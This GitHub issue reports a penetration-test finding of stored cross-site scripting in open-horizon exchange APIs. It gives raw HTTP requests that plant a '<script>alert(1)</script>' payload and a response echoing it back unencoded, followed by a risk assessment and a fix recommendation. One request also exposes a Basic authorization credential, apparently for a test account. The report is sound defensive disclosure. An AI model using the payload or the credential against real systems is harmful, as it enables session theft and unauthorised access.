### ISSUE TITLE
Penetration test finding - Possible XSS 

### ISSUE THREAD

**Issue by ctiijima** [open-horizon/anax#1173]
The following is from the penetration test team:

**Description**
In the APIs, few parameters are getting stored the user-supplied input without properly encoding the characters like <.>, / Which can allow malicious users to execute XSS.
Note: This issue applies to all the APIs which are accepting user input and returning the same user input back to the user.

**Affected URL/API(s)**
PUT /ec-css/api/v1/objects/{orgID}/{objectType}/{objectID}/destinations - Set the destinations of an object.
POST /ec-exchange/v1/orgs/{orgid}/agbots/{id}/msgs - Sends a msg from a node to an agbot
POST /ec-exchange/v1/orgs/{orgid}/nodes/{id}/msgs - Sends a msg from an agbot to a node

**Request/Response**
Request-1:
POST /ec-exchange/v1/orgs/<host>/agbots/test-agbot1/msgs?username=test- node&password=test HTTP/1.1
Content-Type: application/json
User-Agent: PostmanRuntime/7.15.2
Accept: */*
Cache-Control: no-cache
Postman-Token: 40f0a6fd-5b1b-437d-b4ef-419f180db64a
Host: <host>:8443
Accept-Encoding: gzip, deflate
Content-Length: 63
Connection: close
{
_**"message": "<script>alert(1)</script>",**_
"ttl": 6400 
}

Request-2:
GET /ec-exchange/v1/orgs/<host>/agbots/test-agbot1/msgs HTTP/1.1
Authorization: Basic cGVudGVzdDAyLWljcC1jbHVzdGVyL2lhbWFwaWtleTplSjhjRjZiMEJjV0Z3Qkpxd01qRFNaQ0d2STNOSFZ ZWF84ekF5akVsRnI0TA==
User-Agent: PostmanRuntime/7.15.2
Accept: */*
Cache-Control: no-cache
Postman-Token: d45e55e2-6967-4bb9-b0db-59973d1849a6
Host: <host>:8443
Accept-Encoding: gzip, deflate
Connection: close

Response
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2019 10:44:21 GMT
Content-Type: application/json;charset=utf-8
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 1800
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,HEAD,OPTIONS,PATCH X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 1078
{"messages":[{"msgId":722,"nodeId":"<host>/test- node","nodePubKey":"ABCDEF","message":"this is test message from PTC3","timeSent":"2019-07- 31T10:42:56.148Z[UTC]","timeExpires":"2019-07- 31T12:29:36.148Z[UTC]"},{"msgId":723,"nodeId":"<host>/test- node","nodePubKey":"ABCDEF","message":"this is test message from PTC3","timeSent":"2019-07- 31T10:42:57.984Z[UTC]","timeExpires":"2019-07- 31T12:29:37.984Z[UTC]"},{"msgId":724,"nodeId":"<host>/test- node","nodePubKey":"ABCDEF","message":"this is test message from PTC3","timeSent":"2019-07- 31T10:43:35.068Z[UTC]","timeExpires":"2019-07- 31T12:30:15.068Z[UTC]"},{"msgId":725,"nodeId":"<host>/test-
node","nodePubKey":"ABCDEF","message":"this is test message from PTC3","timeSent":"2019-07- 31T10:44:03.453Z[UTC]","timeExpires":"2019-07- 31T12:30:43.453Z[UTC]"},{"msgId":726,"nodeId":"<host>/test- node","nodePubKey":"ABCDEF","message":"**_<script>alert(1)</script>_**","timeSent":"2019-07- 31T10:44:15.819Z[UTC]","timeExpires":"2019-07-31T12:30:55.819Z[UTC]"}],"lastIndex":0}

**Risk Assessment**
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials or performing arbitrary actions on the victim's behalf.

**Fix Recommendation**
Perform sensitization on input strings. Use an "accept known good" input validation strategy: a white list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. User input should be HTML-encoded at any point where it is copied into application responses. All HTML meta characters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).

**Comment by dabooz** [comment]
issue: https://github.com/open-horizon/anax/issues/1137 resolved the CSS aspect of issue
